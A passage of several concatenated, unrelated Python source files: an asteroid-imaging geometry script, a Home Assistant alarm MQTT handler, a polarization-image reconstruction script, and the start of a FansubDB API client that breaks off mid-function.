    ra = -ast_sc_lon
    if dec > 90:
        dec = 90 + ast_sc_lat
        ra = tools.wrap_degs(ra + 180)
    print('ra: %f, dec: %f, zlra: %f' % (ra, dec, ast_axis_img_clk_ang))
    ast_igrf_q = ast_scf_q * sc_igrf_q
    # Rotate body-fixed vectors into the inertial (J2000) frame.
    sun_ast_igrf_r = tools.q_times_v(ast_igrf_q, sun_ast_bff_r)
    ast_sc_igrf_r = tools.q_times_v(ast_igrf_q, ast_sc_bff_r)
    sun_sc_igrf_r = tools.q_times_v(ast_igrf_q, sun_sc_bff_r)
    # Asteroid rotation axis and zero-longitude direction in J2000.
    z_axis = np.array([0, 0, 1])
    x_axis = np.array([1, 0, 0])
    ast_axis_u = tools.q_times_v(ast_igrf_q, z_axis)
    ast_zlon_u = tools.q_times_v(ast_igrf_q, x_axis)
    ast_axis_dec, ast_axis_ra, _ = tools.cartesian2spherical(*ast_axis_u)
    ast_zlon_proj = tools.vector_rejection(ast_zlon_u, z_axis)
    ast_zlon_ra = tools.angle_between_v(ast_zlon_proj, x_axis)
    ast_zlon_ra *= 1 if np.cross(x_axis, ast_zlon_proj).dot(z_axis) > 0 else -1
    # frame where ast zero lat and lon point towards the sun?
    # ast_axis_ra = -ast_sun_lon
    # ast_axis_dec = 90 - ast_sun_lat
    # ast_axis_zero_lon_ra = 0
    arr2str = lambda arr: '[%s]' % ', '.join(['%f' % v for v in arr])
    print('sun_ast_bff_r: %s' % arr2str(sun_ast_bff_r * 1e3))
    print('sun_sc_bff_r: %s' % arr2str(sun_sc_bff_r * 1e3))
    print('ast_sc_bff_r: %s' % arr2str(ast_sc_bff_r * 1e3))
    # TODO: even the light is wrong, should be right based on the sun_ast and sun_sc vectors!!
    print('sun_ast_igrf_r: %s' % arr2str(sun_ast_igrf_r * 1e3))
    print('sun_sc_igrf_r: %s' % arr2str(sun_sc_igrf_r * 1e3))
    print('ast_sc_igrf_r: %s' % arr2str(ast_sc_igrf_r * 1e3))
    print('ast_axis_ra: %f' % degs(ast_axis_ra))
    print('ast_axis_dec: %f' % degs(ast_axis_dec))
    print('ast_zlon_ra: %f' % degs(ast_zlon_ra))
    # Spacecraft orientation as angle-axis for logging.
    aa = quaternion.as_rotation_vector(sc_igrf_q)
    angle = np.linalg.norm(aa)
    sc_angleaxis = [angle] + list(aa/angle)
    print('sc_angleaxis [rad]: %s' % arr2str(sc_angleaxis))
def load_image_data(image_filename, table_file):
    """Load geometry for one image from a whitespace-delimited LIDAR
    parameter table (paramlid.tab) and print the derived vectors.

    :param image_filename: value of the IMAGE_FILENAME column to look up.
    :param table_file: path to the .tab table; rows start with whitespace,
        hence the leading empty field that is dropped below.
    :raises AssertionError: if no row matches `image_filename`.
    """
    cols = ["OBSERVATION_END_MET", "IMAGE_FILENAME", "OBSERVATION_END_TIME", "SPC_X", "SPC_Y", "SPC_Z", "AST_J2_X",
            "AST_J2_Y", "AST_J2_Z", "SPC_J2_X", "SPC_J2_Y", "SPC_J2_Z", "BODY_SURFACE_DISTANCE", "CENTER_LON",
            "CENTER_LAT", "CENTER_PIXEL_RES", "CELESTIAL_N_CLOCK_ANGLE", "BODY_POLE_CLOCK_ANGLE",
            "BODY_POLE_ASPECT_ANGLE", "SUN_DIR_CLOCK_ANGLE", "RIGHT_ASCENSION", "DECLINATION", "SUBSOLAR_LON",
            "SUBSOLAR_LAT", "INCIDENCE_ANGLE", "EMISSION_ANGLE", "PHASE_ANGLE", "SOLAR_ELONGATION", "SUB_SC_LON",
            "SUB_SC_LAT", "BODY_CENTER_DISTANCE", "PIXEL_OFFSET_X", "PIXEL_OFFSET_Y", "AST_SUN_ROT_ANGLE"]
    idx = dict(zip(cols, range(len(cols))))
    with open(table_file, 'r') as fh:
        # drop the empty leading field produced by leading whitespace
        alldata = [re.split(r'\s+', row)[1:] for row in fh]
    d = None
    for row in alldata:
        if row[idx['IMAGE_FILENAME']] == image_filename:
            d = row
            break
    assert d is not None, 'data for image %s not found' % image_filename
    # spacecraft orientation, equatorial J2000
    sc_rot_ra = float(d[idx['RIGHT_ASCENSION']])
    sc_rot_dec = float(d[idx['DECLINATION']])
    sc_rot_cnca = float(d[idx['CELESTIAL_N_CLOCK_ANGLE']])
    sc_igrf_q = tools.ypr_to_q(rads(sc_rot_dec), rads(sc_rot_ra), -rads(sc_rot_cnca))  # same with rosetta lbls also
    # Bug fix: astype(np.float) — the np.float alias was deprecated in
    # NumPy 1.20 and removed in 1.24; use the builtin float (== float64).
    sun_ast_igrf_r = np.array([d[idx['AST_J2_X']], d[idx['AST_J2_Y']], d[idx['AST_J2_Z']]]).astype(float)
    sun_sc_igrf_r = np.array([d[idx['SPC_J2_X']], d[idx['SPC_J2_Y']], d[idx['SPC_J2_Z']]]).astype(float)
    arr2str = lambda arr: '[%s]' % ', '.join(['%f' % v for v in arr])
    print('sun_ast_igrf_r: %s' % arr2str(sun_ast_igrf_r * 1e3))
    print('sun_sc_igrf_r: %s' % arr2str(sun_sc_igrf_r * 1e3))
    print('ast_sc_igrf_r: %s' % arr2str((sun_sc_igrf_r - sun_ast_igrf_r) * 1e3))
    # print('ast_axis_ra: %f' % degs(ast_axis_ra))
    # print('ast_axis_dec: %f' % degs(ast_axis_dec))
    # print('ast_zlon_ra: %f' % degs(ast_zlon_ra))
    # Spacecraft orientation as angle-axis for logging.
    aa = quaternion.as_rotation_vector(sc_igrf_q)
    angle = np.linalg.norm(aa)
    sc_angleaxis = [angle] + list(aa/angle)
    print('sc_angleaxis [rad]: %s' % arr2str(sc_angleaxis))
if __name__ == '__main__':
    # Hard-coded toggle: flip `if 1` to `if 0` to exercise the LIDAR-table
    # loader instead of the .lbl metadata loader.
    if 1:
        load_image_meta(r'C:\projects\sispo\data\targets\st_2422895458_v.lbl', None)
    else:
        load_image_data('st_2422895458_v.fit', r'C:\projects\sispo\data\targets\hayabusa_paramlid.tab')
|
<reponame>avidit/home-assistant-config
import json
import logging
from homeassistant.core import (
HomeAssistant,
callback,
)
from homeassistant.components.mqtt import (
DOMAIN as ATTR_MQTT,
CONF_STATE_TOPIC,
CONF_COMMAND_TOPIC,
)
import homeassistant.components.mqtt as mqtt
from homeassistant.helpers.json import JSONEncoder
from homeassistant.util import slugify
from homeassistant.helpers.dispatcher import async_dispatcher_connect
from . import const
from .helpers import (
friendly_name_for_entity_id,
)
# Module-level logger for this integration.
_LOGGER = logging.getLogger(__name__)
# Config key for the MQTT topic on which alarm events are published.
CONF_EVENT_TOPIC = "event_topic"
class MqttHandler:
    """Bridge between the alarm integration and MQTT.

    Publishes state changes and events to configurable topics, and listens on a
    command topic for arm/disarm commands. All wiring happens in ``__init__``
    via dispatcher signals; configuration is (re)loaded whenever the
    ``alarmo_config_updated`` signal fires.
    """

    def __init__(self, hass: HomeAssistant):
        self.hass = hass
        self._config = None
        # Unsubscribe callables returned by mqtt.async_subscribe.
        self._subscribed_topics = []
        # Unsubscribe callables returned by async_dispatcher_connect.
        self._subscriptions = []

        async def async_update_config(_args=None):
            """mqtt config updated, reload the configuration."""
            old_config = self._config
            new_config = self.hass.data[const.DOMAIN]["coordinator"].store.async_get_config()

            if old_config and old_config[ATTR_MQTT] == new_config[ATTR_MQTT]:
                # only update MQTT config if some parameters are changed
                return

            self._config = new_config

            if not old_config or old_config[ATTR_MQTT][CONF_COMMAND_TOPIC] != new_config[ATTR_MQTT][CONF_COMMAND_TOPIC]:
                # re-subscribing is only needed if the command topic has changed
                await self._async_subscribe_topics()

            _LOGGER.debug("MQTT config was (re)loaded")

        self._subscriptions.append(
            async_dispatcher_connect(hass, "alarmo_config_updated", async_update_config)
        )
        # Load the initial configuration asynchronously.
        self.hass.async_add_job(async_update_config)

        @callback
        def async_alarm_state_changed(area_id: str, old_state: str, new_state: str):
            """Publish the (possibly remapped) alarm state on the state topic."""
            if not self._config[ATTR_MQTT][const.ATTR_ENABLED]:
                return
            topic = self._config[ATTR_MQTT][CONF_STATE_TOPIC]
            if not topic:  # do not publish if no topic is provided
                return

            if area_id and len(self.hass.data[const.DOMAIN]["areas"]) > 1:
                # handle the sending of a state update for a specific area:
                # insert the slugified area name before the last topic segment.
                area = self.hass.data[const.DOMAIN]["areas"][area_id]
                topic = topic.rsplit('/', 1)
                topic.insert(1, slugify(area.name))
                topic = "/".join(topic)

            # Allow the user to remap state names through the payload config.
            payload_config = self._config[ATTR_MQTT][const.ATTR_STATE_PAYLOAD]
            if new_state in payload_config and payload_config[new_state]:
                message = payload_config[new_state]
            else:
                message = new_state

            hass.async_create_task(mqtt.async_publish(self.hass, topic, message, retain=True))
            _LOGGER.debug("Published state '{}' on topic '{}'".format(message, topic))

        self._subscriptions.append(
            async_dispatcher_connect(self.hass, "alarmo_state_updated", async_alarm_state_changed)
        )

        @callback
        def async_handle_event(event: str, area_id: str, args: dict = None):
            """Publish a JSON event payload on the event topic.

            ``args`` carries event-specific data (delay, arm mode, open sensors,
            ...). FIX: the original used a mutable default ``args: dict = {}``;
            replaced with ``None`` + guard to avoid the shared-default pitfall.
            """
            if args is None:
                args = {}
            if not self._config[ATTR_MQTT][const.ATTR_ENABLED]:
                return
            topic = self._config[ATTR_MQTT][CONF_EVENT_TOPIC]
            if not topic:  # do not publish if no topic is provided
                return

            if area_id and len(self.hass.data[const.DOMAIN]["areas"]) > 1:
                # handle the sending of a state update for a specific area
                area = self.hass.data[const.DOMAIN]["areas"][area_id]
                topic = topic.rsplit('/', 1)
                topic.insert(1, slugify(area.name))
                topic = "/".join(topic)

            if event == const.EVENT_ARM:
                payload = {
                    # e.g. arm_mode "armed_away" -> event "ARM_AWAY"
                    "event": "{}_{}".format(
                        event.upper(),
                        args["arm_mode"].split("_", 1).pop(1).upper()
                    ),
                    "delay": args["delay"],
                }
            elif event == const.EVENT_TRIGGER:
                payload = {
                    "event": event.upper(),
                    "delay": args["delay"],
                    "sensors": [
                        {
                            "entity_id": entity,
                            "name": friendly_name_for_entity_id(entity, self.hass),
                        }
                        for (entity, state) in args["open_sensors"].items()
                    ]
                }
            elif event == const.EVENT_FAILED_TO_ARM:
                payload = {
                    "event": event.upper(),
                    "sensors": [
                        {
                            "entity_id": entity,
                            "name": friendly_name_for_entity_id(entity, self.hass),
                        }
                        for (entity, state) in args["open_sensors"].items()
                    ]
                }
            elif event == const.EVENT_COMMAND_NOT_ALLOWED:
                payload = {
                    "event": event.upper(),
                    "state": args["state"],
                    "command": args["command"].upper()
                }
            elif event in [const.EVENT_INVALID_CODE_PROVIDED, const.EVENT_NO_CODE_PROVIDED]:
                payload = {
                    "event": event.upper()
                }
            else:
                # Unknown events are silently ignored.
                return

            payload = json.dumps(payload, cls=JSONEncoder)
            hass.async_create_task(mqtt.async_publish(self.hass, topic, payload))

        self._subscriptions.append(
            async_dispatcher_connect(self.hass, "alarmo_event", async_handle_event)
        )

    def __del__(self):
        """prepare for removal"""
        # NOTE(review): relies on garbage collection for teardown; an explicit
        # async_unload method would be more deterministic — keep interface as-is.
        while len(self._subscribed_topics):
            self._subscribed_topics.pop()()
        while len(self._subscriptions):
            self._subscriptions.pop()()

    async def _async_subscribe_topics(self):
        """install a listener for the command topic."""
        if len(self._subscribed_topics):
            # Drop any previous subscription before re-subscribing.
            while len(self._subscribed_topics):
                self._subscribed_topics.pop()()
            _LOGGER.debug("Removed subscribed topics")

        if not self._config[ATTR_MQTT][const.ATTR_ENABLED]:
            return

        self._subscribed_topics.append(
            await mqtt.async_subscribe(
                self.hass,
                self._config[ATTR_MQTT][CONF_COMMAND_TOPIC],
                self.async_message_received,
            )
        )
        _LOGGER.debug("Subscribed to topic {}".format(self._config[ATTR_MQTT][CONF_COMMAND_TOPIC]))

    # NOTE(review): decorating an ``async def`` with @callback is unusual —
    # mqtt.async_subscribe handles coroutine functions either way; confirm the
    # decorator is intentional before removing it.
    @callback
    async def async_message_received(self, msg):
        """Parse an incoming MQTT command message and dispatch it to an area."""
        command = None
        code = None
        area = None
        try:
            payload = json.loads(msg.payload)
            payload = {k.lower(): v for k, v in payload.items()}

            # Accept several synonymous keys for the command and the code.
            if "command" in payload:
                command = payload["command"]
            elif "cmd" in payload:
                command = payload["cmd"]
            elif "action" in payload:
                command = payload["action"]
            elif "state" in payload:
                command = payload["state"]

            if "code" in payload:
                code = payload["code"]
            elif "pin" in payload:
                code = payload["pin"]
            elif "password" in payload:
                code = payload["password"]
            elif "pincode" in payload:
                code = payload["pincode"]

            if "area" in payload and payload["area"]:
                area = payload["area"]
        except ValueError:
            # no JSON structure found: treat the raw payload as the command
            command = msg.payload
            code = None

        if isinstance(command, str):
            command = command.lower()
        else:
            _LOGGER.warning("Received unexpected command")
            return

        # Map configured (or default) payload strings to canonical commands.
        payload_config = self._config[ATTR_MQTT][const.ATTR_COMMAND_PAYLOAD]
        skip_code = not self._config[ATTR_MQTT][const.ATTR_REQUIRE_CODE]

        command_payloads = {}
        for item in const.COMMANDS:
            if item in payload_config and payload_config[item]:
                command_payloads[item] = payload_config[item].lower()
            elif item not in payload_config:
                command_payloads[item] = item.lower()

        if command not in list(command_payloads.values()):
            _LOGGER.warning("Received unexpected command: %s", command)
            return

        if area:
            # Match by slugified area name.
            res = list(filter(lambda el: slugify(el.name) == area, self.hass.data[const.DOMAIN]["areas"].values()))
            if not res:
                _LOGGER.warning("Area {} does not exist".format(area))
                return
            entity = res[0]
        else:
            # No area given: fall back to the master entity (multi-area) or the
            # single configured area.
            if self._config[const.ATTR_MASTER][const.ATTR_ENABLED] and len(self.hass.data[const.DOMAIN]["areas"]) > 1:
                entity = self.hass.data[const.DOMAIN]["master"]
            elif len(self.hass.data[const.DOMAIN]["areas"]) == 1:
                entity = list(self.hass.data[const.DOMAIN]["areas"].values())[0]
            else:
                _LOGGER.warning("No area specified")
                return

        _LOGGER.debug("Received command {}".format(command))

        if command == command_payloads[const.COMMAND_DISARM]:
            await entity.async_alarm_disarm(code=code, skip_code=skip_code)
        elif command == command_payloads[const.COMMAND_ARM_AWAY]:
            await entity.async_alarm_arm_away(code, skip_code)
        elif command == command_payloads[const.COMMAND_ARM_NIGHT]:
            await entity.async_alarm_arm_night(code, skip_code)
        elif command == command_payloads[const.COMMAND_ARM_HOME]:
            await entity.async_alarm_arm_home(code, skip_code)
        elif command == command_payloads[const.COMMAND_ARM_CUSTOM_BYPASS]:
            await entity.async_alarm_arm_custom_bypass(code, skip_code)
        elif command == command_payloads[const.COMMAND_ARM_VACATION]:
            await entity.async_alarm_arm_vacation(code, skip_code)
|
import sys
sys.path.append('C:/python scripts/ciecam02 plot')
import Read_Meredith as rm
# from scipy.ndimage import binary_dilation
# from scipy.stats import circstd
# import scipy.fftpack as fftpack
# from scipy.linalg import solve_banded
import vispol
import numpy as np
from scipy.sparse.linalg import spsolve
# from scipy.sparse.linalg import spilu
import matplotlib.pyplot as plt
from scipy.signal import convolve2d
# from scipy.ndimage import gaussian_filter
from scipy.ndimage import grey_erosion
from scipy.signal import medfilt2d
from scipy.signal import wiener
def ang_diff(D):
    """Fold an angle difference into a signed score in [-1, 1].

    Wraps ``D + pi/2`` into ``[-pi, pi)`` and maps its magnitude linearly,
    giving 1 at ``D == pi/2`` and -1 at ``D == -pi/2``.
    """
    pi = np.pi
    wrapped = np.mod(D + pi / 2, 2 * pi) - pi
    return 1 - (2 / pi) * np.abs(wrapped)
# --- Setup: register colormaps, pick a dataset, and preprocess AoP ----------
vispol.register_cmaps()
data_folder = 'c:/users/z5052714/documents/unsw/unsw/data_sets/'
# filename = data_folder + 'forscottfrommeredith/162041.L1B2.v006.hdf5'
# filename = data_folder + 'forscottfrommeredith/162651.L1B2.v006.hdf5'
filename = data_folder + 'forscottfrommeredith/094821.L1B2.v006.hdf5'
# I, P, A = rm.getIPA(filename, start=[2, 32], end=[3900, 1403])
# P: degree of polarization, A: angle of polarization in degrees —
# presumably; confirm against Read_Meredith.getIPA.
_, P, A = rm.getIPA(filename, start=[2, 32], end=[3000, 1403])
# I, P, A = rm.getIPA(filename, start=[1000, 800], end=[1600, 1300])
# I, _, A = rm.getIPA(filename, start=[2000, 150], end=[2200, 450]) # looks great
# _, _, A = rm.getIPA(filename, start=[1500, 150], end=[2200, 450]) # looks good with scaling
# _, _, A = rm.getIPA(filename, start=[2, 150], end=[2600, 1000])
# I = np.clip(I/np.percentile(I,99), 0, 1)
A *= np.pi/180.0  # degrees -> radians
A[A > np.pi] -= np.pi  # wrap AoP into [0, pi)
delta = vispol.delta_aop(A)  # local AoP variability — TODO confirm semantics
# Rotated copies of the AoP, each re-wrapped into [0, pi).
A45 = A + np.pi/8
A45[A45 > np.pi] -= np.pi
Aneg45 = A - np.pi/8
Aneg45[Aneg45 < 0 ] += np.pi
# --- Optional patch diagnostics (disabled) and a first look at the data -----
# plt.plot(np.linspace(-np.pi, np.pi, 256), ang_diff(np.linspace(-np.pi, np.pi, 256)))
# delta_patch = delta[2520:2620, 1200:1300].reshape((-1, 1))
# A_patch = A[2520:2620, 1200:1300].reshape((-1, 1))
# P_patch = P[2520:2620, 1200:1300].reshape((-1, 1))
# hist1, hist2, edges = np.histogram2d(A_patch, delta_patch, bins='fd')
# f, ax = plt.subplots(3)
# ax[0].scatter(A_patch, delta_patch)
# ax[1].scatter(A_patch, P_patch)
# ax[2].scatter(P_patch, delta_patch)
# print(np.mean(P_patch))
# print(np.std(P_patch))
# print(vispol.circular_mean(A_patch))
# print(np.sqrt(-2 * np.log(np.hypot(np.mean(np.sin(2 * A_patch)), np.mean(np.cos(2 * A_patch))))))
# print(np.mean(delta_patch))
# plt.show()
cap = 95   # percentile used when normalizing the Laplacian (see disabled code below)
sigma = 2  # unused here — kept from an earlier smoothing experiment
# delta = grey_erosion(delta, size=(5, 5))
# delta = medfilt2d(delta, 7)
# delta = wiener(delta, 5)
# A, _ = vispol.histogram_eq(A,
#                            weighted=True,
#                            min_change=0.25,
#                            element=5,
#                            deltas = delta,
#                            suppress_noise=True,
#                            interval=[0.0,np.pi])#,
# #                           box=[[1100, A.shape[0]], [0, A.shape[1]]])
# plt.imsave("C:/users/z5052714/documents/weekly_meetings/28-06-2019/AoP_rot.png", A, cmap="AoP", vmin=0, vmax=np.pi)
# Show cos/sin projections of the (doubled) angle for the original and
# rotated AoP maps.
f, ax = plt.subplots(1, 4)
# ax[0].imshow(delta, vmin=0, vmax=1)
# ax[1].imshow(A, vmin=0, vmax=np.pi, cmap="AoP")
# ax[2].imshow(P, vmin=0, vmax=1)
ax[0].imshow(np.cos(2 * A), cmap="gray")
ax[1].imshow(np.cos(2 * A45), cmap="gray")
ax[2].imshow(np.sin(2 * A), cmap="gray")
ax[3].imshow(np.cos(2 * Aneg45), cmap="gray")
plt.show()
# --- Forward/backward difference kernels for the four axis directions -------
# kernel = np.array([[0, 1, 0], [1, -4, 1], [0, 1, 0]])
# Ld = convolve2d(delta, kernel, mode='same', boundary='symm')
# Ld /= np.percentile(np.abs(Ld), cap)
# Ld = np.clip(Ld, -1, 1)
x_neg = np.array([[0, 0, 0],
                  [0, -1, 1],
                  [0, 0, 0]])
x_pos = np.array([[0, 0, 0],
                  [1, -1, 0],
                  [0, 0, 0]])
y_neg = np.array([[0, 0, 0],
                  [0, -1, 0],
                  [0, 1, 0]])
y_pos = np.array([[0, 1, 0],
                  [0, -1, 0],
                  [0, 0, 0]])
# Accumulator for the pseudo-Laplacian built from angular differences.
L = np.zeros_like(A)
# --- Accumulate angular-difference "Laplacian" over the four directions -----
# plt.imshow(medfilt2d(delta, 7))
# plt.show()
# f, ax = plt.subplots(1,4)
# cosA = np.cos(2 * A)
# sinA = np.sin(2 * A)
# ax[0].imshow(cosA, vmin=-1, vmax=1, cmap="BlueWhiteRed")
# ax[2].imshow(sinA, vmin=-1, vmax=1, cmap="BlueWhiteRed")
# filt_size = 5
# cosA = wiener(cosA, filt_size)
# sinA = wiener(sinA, filt_size)
# cosA = medfilt2d(cosA, filt_size)
# sinA = medfilt2d(sinA, filt_size)
# ax[1].imshow(cosA, vmin=-1, vmax=1, cmap="BlueWhiteRed")
# ax[3].imshow(sinA, vmin=-1, vmax=1, cmap="BlueWhiteRed")
# plt.show()
# Pixels where cos(2A) is ~1: the unrotated difference is unreliable there,
# so the 45-degree-rotated result is substituted below.
close_to_zero = np.abs(np.cos(2 * A) - 1) < 0.000005
for kernel in [x_neg, x_pos, y_neg, y_pos]:
# for kernel in [x_neg, y_neg]:
#     Lsub = np.sin(convolve2d(A, kernel, mode='same', boundary='symm'))
    # Directional angular differences for the original and rotated AoP.
    Lsub0 = ang_diff(convolve2d(A, kernel, mode='same', boundary='symm'))
    Lsub45 = ang_diff(convolve2d(A45, kernel, mode='same', boundary='symm'))
    # Per-direction diagnostic plots.
    f, ax = plt.subplots(1, 5)
    ax[0].imshow(Lsub0, vmin=-1, vmax=1, cmap="BlueWhiteRed")
    ax[1].imshow(Lsub45, vmin=-1, vmax=1, cmap="BlueWhiteRed")
    ax[2].imshow(close_to_zero)
    ax[3].imshow(Lsub0 - Lsub45, cmap="BlueWhiteRed", vmin=-0.1, vmax=0.1)
    Lsub = Lsub0
    Lsub[close_to_zero] = Lsub45[close_to_zero]
    ax[4].imshow(Lsub - Lsub0, vmin=-.1, vmax=.1, cmap="BlueWhiteRed")
    # plt.show()
#     cos_arr = convolve2d(cosA, kernel, mode='same', boundary='symm')
#     sin_arr = convolve2d(sinA, kernel, mode='same', boundary='symm')
#     Lsub = cos_arr
#     Lsub[np.abs(cos_arr) < np.abs(sin_arr)] = sin_arr[np.abs(cos_arr) < np.abs(sin_arr)]
    L += Lsub
# L[500,500] = 0
# L = np.sin(np.pi/2 * L)
# from scipy.special import erf, erfinv
# endpoint = 0.99999999999
# factor = erfinv(endpoint)
# L = erf(factor * L) / endpoint
plt.figure()
plt.imshow(L, cmap="BlueWhiteRed", vmin=-1, vmax=1)
# --- Solve the Poisson system and visualize the reconstructed map -----------
# FIX: the final ``plt.show()`` line carried a stray ``|`` character (a
# copy/paste artifact) that made it a syntax error; removed.
# plt.show()
n, m = A.shape
# kernel = np.array([[0, 1, 0], [1, -4, 1], [0, 1, 0]])
# L_F = fftpack.fft2(L)
# K_F = fftpack.fft2(kernel, shape=L.shape)
# f, ax = plt.subplots(1, 2)
# ax[0].imshow(np.real(L_F))
# ax[1].imshow(np.real(K_F))
# plt.show()
# U = fftpack.ifft2(L_F / K_F)
M = vispol.construct_matrix(A.shape, type='laplacian')
# M = vispol.construct_matrix(A.shape, type='lap_xy')
# Solve M @ u = L for the scalar field whose Laplacian matches L.
U = spsolve(M, L.reshape(n * m, 1)).reshape((n, m))
# U -= np.median(U)
#
# U /= 2 * np.max(np.abs(U))
# U += 0.5
#
# Normalize to [0, 1]; the "enhanced" copy clips the 1st/99th percentiles
# and applies a small Wiener filter.
U = (U - np.min(U)) / (np.max(U) - np.min(U))
U_enhanced = (U - np.percentile(U, 1)) / (np.percentile(U, 99) - np.percentile(U, 1))
U_enhanced = np.clip(wiener(U_enhanced, 3), 0, 1)
U = np.clip(U, 0, 1)
Ushrink = U_enhanced * (0.8 - 0.2) + 0.2  # compress into [0.2, 0.8] for display
plt.figure()
# Compare slopes along one image row between the AoP and the reconstruction.
# NOTE(review): A_slice is normalized by pi before ang_diff, which expects
# radians — confirm this scaling is intentional.
A_slice = A[1000, :600] / np.pi
# A_slice[A_slice > 0.93] -= 1
# A_slice[564:] -= 1
U_slice = U[1000, :600]
slopes_A = ang_diff(np.convolve(A_slice, [-1, 1], mode='same'))
slopes_U = np.convolve(U_slice, [-1, 1], mode='same')
# A_slice = (A_slice - np.min(A_slice)) / (np.max(A_slice) - np.min(A_slice))
# U_slice = (U_slice - np.min(U_slice)) / (np.max(U_slice) - np.min(U_slice))
# A_delta = np.convolve(A_slice, [1, -1], mode='same')
# A_slice[A_delta > 0.5] -= 0.5
# A_slice[A_delta < -0.5] += 0.5
plt.plot(range(599), slopes_A[1:])
plt.plot(range(599), slopes_U[1:])
# plt.plot(range(600), slopes_A / slopes_U)
# plt.plot(range(600), np.abs(slopes_A / slopes_U))
# Use inverted, normalized delta as a stand-in for degree of polarization.
P = 1 - np.clip(delta / np.max(delta), 0, 1)
# mask_params ={'thresh':0.4,
#               'smooth':True,
#               'morph':True}
# delta_params = {'mask_on':True, 'mask_params':mask_params}
# dmask = vispol.dmask(delta, thresh=0.3, smooth=True, morph=True)
# U *= dmask
# A += np.pi/2
RGB = vispol.IPAtoRGB(I=Ushrink, P=P, A=A, dependent="P")
f, ax = plt.subplots(1, 2)
# plt.imsave("C:/users/z5052714/documents/weekly_meetings/28-06-2019/U.png", U, cmap="gray")
# plt.imsave("C:/users/z5052714/documents/weekly_meetings/28-06-2019/U_enhanced.png", U_enhanced, cmap="gray")
# plt.imsave("C:/users/z5052714/documents/weekly_meetings/28-06-2019/RGB_rot.png", RGB)
ax[0].imshow(U_enhanced, cmap="gray")
ax[1].imshow(RGB)
# for idx, sig in enumerate([30, 20, 10, 5]):
#     ax[idx + 1].imshow(U - gaussian_filter(U, sigma=sig), cmap="gray")
#     ax[idx].imshow(Usig, cmap="gray")
plt.show()
<reponame>noaione/naoTimes
"""
MIT License
Copyright (c) 2019-2021 naoTimesdev
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
"""
import asyncio
import logging
import re
from typing import Any, AnyStr, List, Optional, Tuple, Union
import aiohttp
import arrow
import orjson
from ..models import fsdb as fsdbmodel
from ..utils import AttributeDict
from ..version import __version__ as bot_version
__all__ = ("FansubDBBridge",)
class FSDBAPIError(Exception):
    """Raised when a FansubDB API call fails, carrying the HTTP-ish code."""

    def __init__(self, code: int, message: AnyStr) -> None:
        super().__init__(f"{code}: {message}")
        self.code = code
        self.message = message
class FansubDBBridge:
    """Async client bridging naoTimes and the FansubDB REST API.

    Handles token-based authentication, request plumbing, and the CRUD
    operations on anime, fansub, and project resources.
    """

    def __init__(
        self,
        username: str,
        password: str,
        session: aiohttp.ClientSession,
        loop: asyncio.AbstractEventLoop = None,
    ):
        self.logger = logging.getLogger("naoTimes.FansubDB")
        # Track whether the session was provided (and thus owned) externally.
        self._outside_session = False
        if session is not None:
            self.session = session
            self._outside_session = True
        else:
            self.session = aiohttp.ClientSession(
                headers={
                    "User-Agent": f"naoTimes-FSDB/v{bot_version} (+https://github.com/noaione/naoTimes)",
                }
            )
        self._user = username
        self._pass = password
        self._loop: asyncio.AbstractEventLoop = loop
        if loop is None:
            self._loop = asyncio.get_event_loop()
        self.BASE_URL = "https://db.silveryasha.web.id"
        self.BASE_API = f"{self.BASE_URL}/api"
        # Map lowercase HTTP verbs to the bound session methods.
        self._method_map = {
            "get": self.session.get,
            "post": self.session.post,
            "put": self.session.put,
            "delete": self.session.delete,
        }
        self._token = ""
        self._expire = None
        # self._loop.run_until_complete(self.authorize())

    @property
    def token_data(self):
        """Current token and its expiry timestamp as a dict."""
        return {"token": self._token, "expires": self._expire}

    def set_token(self, token: str, expires: Optional[Union[int, float]]):
        """Inject a previously saved token and expiry (e.g. from storage)."""
        self._token = token
        self._expire = expires

    @staticmethod
    def get_close_matches(target: str, lists: list) -> list:
        """
        Find close matches from input target
        Sort everything if there's more than 2 results
        """
        target_compiler = re.compile("({})".format(target), re.IGNORECASE)
        return [fres for fres in lists if target_compiler.search(fres["name"])]

    async def close(self):
        """Close all session connection."""
        # Only close sessions we created ourselves.
        if not self._outside_session:
            await self.session.close()

    async def request_db(self, method: str, url: str, **kwargs) -> Tuple[AnyStr, int]:
        """Request a webpage to the FansubDB website.
        Might be the API or just normal page.

        :param method: HTTP Method to use (GET, POST, PUT)
        :type method: str
        :param url: URL to fetch
        :type url: str
        :return: String or bytes from the webpage, and the HTTP status code
        :rtype: Tuple[AnyStr, int]
        """
        methods = self._method_map.get(method.lower())
        main_headers = kwargs.pop("headers", {})
        all_headers = {"Content-Type": "application/json", "X-Requested-With": "naoTimes-FansubDB"}
        if self._token:
            all_headers["Authorization"] = f"Bearer {self._token}"
        merged_headers = {**main_headers, **all_headers}
        resp: aiohttp.ClientResponse
        async with methods(url, headers=merged_headers, **kwargs) as resp:
            res = await resp.text()
            code = resp.status
            return res, code

    async def request_api(
        self, method: str, endpoint: str, **kwargs
    ) -> Union[List[AttributeDict], AttributeDict, Any]:
        """Call an API endpoint and decode the JSON response.

        Wraps items/objects in :class:`AttributeDict` where possible and
        raises :class:`FSDBAPIError` on decode or transport failure.
        """
        url = f"{self.BASE_API}/{endpoint}"
        json_data = kwargs.get("json", kwargs.get("data", None))
        self.logger.info(f"{method}: request to /api/{endpoint}: {json_data}")
        ret_code = 500
        try:
            res, code = await self.request_db(method, url, **kwargs)
            ret_code = code
            self.logger.debug(f"Response from {url}: {res}")
            data = orjson.loads(res)
        # FIX: orjson.loads raises JSONDecodeError, not JSONEncodeError.
        except orjson.JSONDecodeError as e:
            self.logger.error(f"Failed to decode JSON response: {e}")
